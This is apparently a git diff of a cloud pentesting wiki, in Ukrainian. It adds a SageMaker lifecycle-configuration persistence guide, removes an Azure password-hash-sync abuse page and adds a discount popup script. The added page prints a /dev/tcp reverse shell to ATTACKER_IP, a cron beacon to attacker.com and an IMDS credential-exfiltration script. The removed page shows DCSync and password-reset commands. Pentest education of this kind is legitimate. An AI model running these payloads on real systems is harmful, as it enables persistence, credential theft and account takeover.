diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index 17225a2e2..582319269 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -442,11 +442,13 @@
   - [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md)
   - [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md)
     - [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md)
-      - [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
-      - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+      - [Az - Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md)
       - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md)
       - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md)
-      - [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md)
+      - [Az - Cloud Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-sync.md)
+      - [Az - Connect Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-connect-sync.md)
+      - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md)
+      - [Az - Domain Services](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-domain-services.md)
       - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md)
       - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md)
       - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md)
diff --git a/src/images/discount.jpeg b/src/images/discount.jpeg
new file mode 100644
index 000000000..5c0b098d4
Binary files /dev/null and b/src/images/discount.jpeg differ
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
new file mode 100644
index 000000000..2140c254d
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md
@@ -0,0 +1,156 @@
+# AWS - SageMaker Lifecycle Configuration Persistence
+
+## Огляд технік збереження
+
+Цей розділ описує методи отримання збереження в SageMaker шляхом зловживання конфігураціями життєвого циклу (LCC), включаючи реверсні оболонки, cron-роботи, крадіжку облікових даних через IMDS та SSH-задні двері. Ці скрипти виконуються з роллю IAM екземпляра і можуть зберігатися між перезавантаженнями. Більшість технік вимагають вихідного мережевого доступу, але використання сервісів на контрольній площині AWS все ще може дозволити успіх, якщо середовище знаходиться в режимі "тільки VPC".
+#### Примітка: Екземпляри блокнотів SageMaker в основному є керованими екземплярами EC2, налаштованими спеціально для навантажень машинного навчання.
+
+## Необхідні дозволи
+* Екземпляри блокнотів:
+```
+sagemaker:CreateNotebookInstanceLifecycleConfig
+sagemaker:UpdateNotebookInstanceLifecycleConfig
+sagemaker:CreateNotebookInstance
+sagemaker:UpdateNotebookInstance
+```
+* Студійні додатки:
+```
+sagemaker:CreateStudioLifecycleConfig
+sagemaker:UpdateStudioLifecycleConfig
+sagemaker:UpdateUserProfile
+sagemaker:UpdateSpace
+sagemaker:UpdateDomain
+```
+## Налаштування конфігурації життєвого циклу на екземплярах блокнотів
+
+### Приклад команд AWS CLI:
+```bash
+# Create Lifecycle Configuration*
+
+aws sagemaker create-notebook-instance-lifecycle-config \
+--notebook-instance-lifecycle-config-name attacker-lcc \
+--on-start Content=$(base64 -w0 reverse_shell.sh)
+
+
+# Attach Lifecycle Configuration to Notebook Instance*
+
+aws sagemaker update-notebook-instance \
+--notebook-instance-name victim-instance \
+--lifecycle-config-name attacker-lcc
+```
+## Налаштування конфігурації життєвого циклу в SageMaker Studio
+
+Конфігурації життєвого циклу можуть бути прикріплені на різних рівнях і до різних типів додатків у SageMaker Studio.
+
+### Рівень домену Studio (всі користувачі)
+```bash
+# Create Studio Lifecycle Configuration*
+
+aws sagemaker create-studio-lifecycle-config \
+--studio-lifecycle-config-name attacker-studio-lcc \
+--studio-lifecycle-config-app-type JupyterServer \
+--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
+
+
+# Apply LCC to entire Studio Domain*
+
+aws sagemaker update-domain --domain-id <DOMAIN_ID> --default-user-settings '{
+"JupyterServerAppSettings": {
+"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
+}
+}'
+```
+### Рівень студії (Індивідуальні або спільні простори)
+```bash
+# Update SageMaker Studio Space to attach LCC*
+
+aws sagemaker update-space --domain-id <DOMAIN_ID> --space-name <SPACE_NAME> --space-settings '{
+"JupyterServerAppSettings": {
+"DefaultResourceSpec": {"LifecycleConfigArn": "<LCC_ARN>"}
+}
+}'
+```
+## Типи конфігурацій життєвого циклу додатків Studio
+
+Конфігурації життєвого циклу можуть бути специфічно застосовані до різних типів додатків SageMaker Studio:
+* JupyterServer: Виконує скрипти під час запуску сервера Jupyter, ідеально підходить для механізмів збереження, таких як реверсні оболонки та cron-завдання.
+* KernelGateway: Виконується під час запуску додатку kernel gateway, корисно для початкової налаштування або постійного доступу.
+* CodeEditor: Застосовується до Code Editor (Code-OSS), дозволяючи скрипти, які виконуються при початку сесій редагування коду.
+
+### Приклад команди для кожного типу:
+
+### JupyterServer
+```bash
+aws sagemaker create-studio-lifecycle-config \
+--studio-lifecycle-config-name attacker-jupyter-lcc \
+--studio-lifecycle-config-app-type JupyterServer \
+--studio-lifecycle-config-content $(base64 -w0 reverse_shell.sh)
+```
+### KernelGateway
+```bash
+aws sagemaker create-studio-lifecycle-config \
+--studio-lifecycle-config-name attacker-kernelgateway-lcc \
+--studio-lifecycle-config-app-type KernelGateway \
+--studio-lifecycle-config-content $(base64 -w0 kernel_persist.sh)
+```
+### CodeEditor
+```bash
+aws sagemaker create-studio-lifecycle-config \
+--studio-lifecycle-config-name attacker-codeeditor-lcc \
+--studio-lifecycle-config-app-type CodeEditor \
+--studio-lifecycle-config-content $(base64 -w0 editor_persist.sh)
+```
+### Critical Info:
+* Прикріплення LCCs на рівні домену або простору впливає на всіх користувачів або програми в межах обсягу.
+* Потребує вищих дозволів (sagemaker:UpdateDomain, sagemaker:UpdateSpace), що зазвичай більш досяжно на рівні простору, ніж на рівні домену.
+* Контроль на рівні мережі (наприклад, сувора фільтрація виходу) може запобігти успішним реверс-шеллам або ексфільтрації даних.
+
+## Reverse Shell via Lifecycle Configuration
+
+SageMaker Lifecycle Configurations (LCCs) виконують користувацькі скрипти, коли екземпляри ноутбуків запускаються. Зловмисник з дозволами може встановити постійний реверс-шелл.
+
+### Payload Example:
+```
+#!/bin/bash
+ATTACKER_IP="<ATTACKER_IP>"
+ATTACKER_PORT="<ATTACKER_PORT>"
+nohup bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1 &
+```
+## Cron Job Persistence via Lifecycle Configuration
+
+Зловмисник може впроваджувати cron завдання через LCC скрипти, забезпечуючи періодичне виконання шкідливих скриптів або команд, що дозволяє приховану стійкість.
+
+### Payload Example:
+```
+#!/bin/bash
+PAYLOAD_PATH="/home/ec2-user/SageMaker/.local_tasks/persist.py"
+CRON_CMD="/usr/bin/python3 $PAYLOAD_PATH"
+CRON_JOB="*/30 * * * * $CRON_CMD"
+
+mkdir -p /home/ec2-user/SageMaker/.local_tasks
+echo 'import os; os.system("curl -X POST http://attacker.com/beacon")' > $PAYLOAD_PATH
+chmod +x $PAYLOAD_PATH
+
+(crontab -u ec2-user -l 2>/dev/null | grep -Fq "$CRON_CMD") || (crontab -u ec2-user -l 2>/dev/null; echo "$CRON_JOB") | crontab -u ec2-user -
+```
+## Витік облікових даних через IMDS (v1 & v2)
+
+Конфігурації життєвого циклу можуть запитувати Службу метаданих екземпляра (IMDS) для отримання облікових даних IAM та витікати їх до місця, контрольованого зловмисником.
+
+### Приклад Payload:
+```bash
+#!/bin/bash
+ATTACKER_BUCKET="s3://attacker-controlled-bucket"
+TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
+ROLE_NAME=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)
+curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME > /tmp/creds.json
+
+# Exfiltrate via S3*
+
+aws s3 cp /tmp/creds.json $ATTACKER_BUCKET/$(hostname)-creds.json
+
+# Alternatively, exfiltrate via HTTP POST*
+
+curl -X POST -F "file=@/tmp/creds.json" http://attacker.com/upload
+```
+
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
deleted file mode 100644
index f56b6e1a1..000000000
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md
+++ /dev/null
@@ -1,114 +0,0 @@
-# Az - PHS - Password Hash Sync
-
-{{#include ../../../../banners/hacktricks-training.md}}
-
-## Основна інформація
-
-[З документації:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Синхронізація хешів паролів** є одним із методів входу, що використовується для досягнення гібридної ідентичності. **Azure AD Connect** синхронізує хеш, хешу, пароля користувача з локальної інстанції Active Directory до хмарної інстанції Azure AD.
-
-<figure><img src="../../../../images/image (173).png" alt=""><figcaption></figcaption></figure>
-
-Це **найпоширеніший метод**, який використовують компанії для синхронізації локального AD з Azure AD.
-
-Всі **користувачі** та **хеш паролів** синхронізуються з локального AD до Azure AD. Однак, **паролі в чистому вигляді** або **оригінальні** **хеші** не надсилаються до Azure AD.\
-Більше того, **вбудовані** групи безпеки (як-от адміністратори домену...) **не синхронізуються** з Azure AD.
-
-**Синхронізація хешів** відбувається кожні **2 хвилини**. Однак, за замовчуванням, **терміни дії паролів** та **терміни дії облікових записів** **не синхронізуються** в Azure AD. Тому користувач, чий **локальний пароль прострочений** (не змінений), може продовжувати **доступ до ресурсів Azure** за допомогою старого пароля.
-
-Коли локальний користувач хоче отримати доступ до ресурсу Azure, **автентифікація відбувається в Azure AD**.
-
-**PHS** необхідний для функцій, таких як **Захист ідентичності** та AAD Domain Services.
-
-## Півотування
-
-Коли PHS налаштовано, деякі **привілейовані облікові записи** автоматично **створюються**:
-
-- Обліковий запис **`MSOL_<installationID>`** автоматично створюється в локальному AD. Цей обліковий запис отримує роль **Облікові записи синхронізації каталогу** (див. [документацію](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)), що означає, що він має **дозволи на реплікацію (DCSync) в локальному AD**.
-- Обліковий запис **`Sync_<name of on-prem ADConnect Server>_installationID`** створюється в Azure AD. Цей обліковий запис може **скидати пароль будь-якого користувача** (синхронізованого або лише хмарного) в Azure AD.
-
-Паролі двох попередніх привілейованих облікових записів **зберігаються в SQL сервері** на сервері, де **встановлено Azure AD Connect.** Адміністратори можуть витягувати паролі цих привілейованих користувачів у чистому вигляді.\
-База даних розташована в `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`.
-
-Можливо витягти конфігурацію з однієї з таблиць, одна з яких зашифрована:
-
-`SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;`
-
-**Зашифрована конфігурація** зашифрована за допомогою **DPAPI** і містить **паролі користувача `MSOL_*`** в локальному AD та пароль **Sync\_\*** в AzureAD. Тому, компрометуючи ці дані, можна підвищити привілеї до AD та AzureAD.
-
-Ви можете знайти [повний огляд того, як ці облікові дані зберігаються та розшифровуються в цій доповіді](https://www.youtube.com/watch?v=JEIR5oGCwdg).
-
-### Знаходження **сервера Azure AD connect**
-
-Якщо **сервер, на якому встановлено Azure AD connect**, приєднаний до домену (рекомендується в документації), його можна знайти за допомогою:
-```bash
-# ActiveDirectory module
-Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl
-
-#Azure AD module
-Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}
-```
-### Зловживання MSOL\_*
-```bash
-# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
-Get-AADIntSyncCredentials
-
-# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
-runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
-Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'
-```
-> [!CAUTION]
-> Ви також можете використовувати [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) для отримання цих облікових даних.
-
-### Зловживання Sync\_\*
-
-Компрометуючи обліковий запис **`Sync_*`**, можливо **скинути пароль** будь-якого користувача (включаючи глобальних адміністраторів)
-```bash
-# This command, run previously, will give us alse the creds of this account
-Get-AADIntSyncCredentials
-
-# Get access token for Sync_* account
-$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
-$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
-Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache
-
-# Get global admins
-Get-AADIntGlobalAdmins
-
-# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
-Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId
-
-# Reset the users password
-Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose
-
-# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)
-```
-Також можливо **змінити паролі лише для користувачів хмари** (навіть якщо це несподівано)
-```bash
-# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
-# The CloudAnchor is of the format USER_ObjectID.
-Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID
-
-# Reset password
-Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers
-```
-Також можливо скинути пароль цього користувача.
-
-> [!CAUTION]
-> Інший варіант полягає в тому, щоб **призначити привілейовані дозволи службі-принципалу**, що **Sync** користувач має **дозволи** на це, а потім **отримати доступ до цього служби-принципалу** як спосіб підвищення привілеїв.
-
-### Seamless SSO
-
-Можливо використовувати Seamless SSO з PHS, який вразливий до інших зловживань. Перевірте це в:
-
-{{#ref}}
-seamless-sso.md
-{{#endref}}
-
-## References
-
-- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs)
-- [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/)
-- [https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf)
-- [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8)
-
-{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/theme/ai.js b/theme/ai.js
index 13337c3f1..02f51127e 100644
--- a/theme/ai.js
+++ b/theme/ai.js
@@ -1,3 +1,104 @@
+/**
+ * HackTricks Training Discounts
+ */
+
+
+(() => {
+  const KEY = 'htSummerDiscountsDismissed';
+  const IMG = '/images/discount.jpeg';
+  const TXT = 'Click here for HT Summer Discounts, Last Days!';
+  const URL = 'https://training.hacktricks.xyz';
+
+  /* Stop if user already dismissed */
+  if (localStorage.getItem(KEY) === 'true') return;
+
+  /* Quick helper */
+  const $ = (tag, css = '') => Object.assign(document.createElement(tag), { style: css });
+
+  /* --- Overlay (blur + dim) --- */
+  const overlay = $('div', `
+    position: fixed; inset: 0;
+    background: rgba(0,0,0,.4);
+    backdrop-filter: blur(6px);
+    display: flex; justify-content: center; align-items: center;
+    z-index: 10000;
+  `);
+
+  /* --- Modal --- */
+  const modal = $('div', `
+    max-width: 90vw; width: 480px;
+    background: #fff; border-radius: 12px; overflow: hidden;
+    box-shadow: 0 8px 24px rgba(0,0,0,.35);
+    font-family: system-ui, sans-serif;
+    display: flex; flex-direction: column; align-items: stretch;
+  `);
+
+  /* --- Title bar (link + close) --- */
+  const titleBar = $('div', `
+    position: relative;
+    padding: 1rem 2.5rem 1rem 1rem; /* room for the close button */
+    text-align: center;
+    background: #222; color: #fff;
+    font-size: 1.3rem; font-weight: 700;
+  `);
+
+  const link = $('a', `
+    color: inherit;
+    text-decoration: none;
+    display: block;
+  `);
+  link.href = URL;
+  link.target = '_blank';
+  link.rel = 'noopener noreferrer';
+  link.textContent = TXT;
+  titleBar.appendChild(link);
+
+  /* Close "X" (no persistence) */
+  const closeBtn = $('button', `
+    position: absolute; top: .25rem; right: .5rem;
+    background: transparent; border: none;
+    color: #fff; font-size: 1.4rem; line-height: 1;
+    cursor: pointer; padding: 0; margin: 0;
+  `);
+  closeBtn.setAttribute('aria-label', 'Close');
+  closeBtn.textContent = '✕';
+  closeBtn.onclick = () => overlay.remove();
+  titleBar.appendChild(closeBtn);
+
+  /* --- Image --- */
+  const img = $('img');
+  img.src = IMG; img.alt = TXT; img.style.width = '100%';
+
+  /* --- Checkbox row --- */
+  const label = $('label', `
+    display: flex; align-items: center; justify-content: center; gap: .6rem;
+    padding: 1rem; font-size: 1rem; color: #222; cursor: pointer;
+  `);
+  const cb = $('input'); cb.type = 'checkbox'; cb.style.scale = '1.2';
+  cb.onchange = () => {
+    if (cb.checked) {
+      localStorage.setItem(KEY, 'true');
+      overlay.remove();
+    }
+  };
+  label.append(cb, document.createTextNode("Don't show again"));
+
+  /* --- Assemble & inject --- */
+  modal.append(titleBar, img, label);
+  overlay.appendChild(modal);
+
+  if (document.readyState === 'loading') {
+    document.addEventListener('DOMContentLoaded', () => document.body.appendChild(overlay), { once: true });
+  } else {
+    document.body.appendChild(overlay);
+  }
+})();
+
+
+
+
+
+
 /**
  * HackTricks AI Chat Widget v1.16 – resizable sidebar
  * ---------------------------------------------------